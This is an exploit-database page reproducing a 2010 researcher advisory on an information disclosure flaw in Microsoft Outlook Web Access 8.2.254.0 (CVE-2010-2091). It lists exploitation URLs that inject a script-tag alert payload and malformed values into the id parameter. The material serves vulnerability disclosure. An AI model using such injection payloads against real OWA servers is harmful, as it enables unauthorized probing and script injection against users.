[] NeoSense
E X P L O I T S
title author type platform port cve id

Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure

Author: Praveen Darshanam
type: webapps
platform: windows
port: 
date_added: 2010-05-23 
date_updated:  
verified: 0 
codes: OSVDB-64980;CVE-2010-2091 
tags: 
aliases:  
screenshot_url:  
application_url: 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.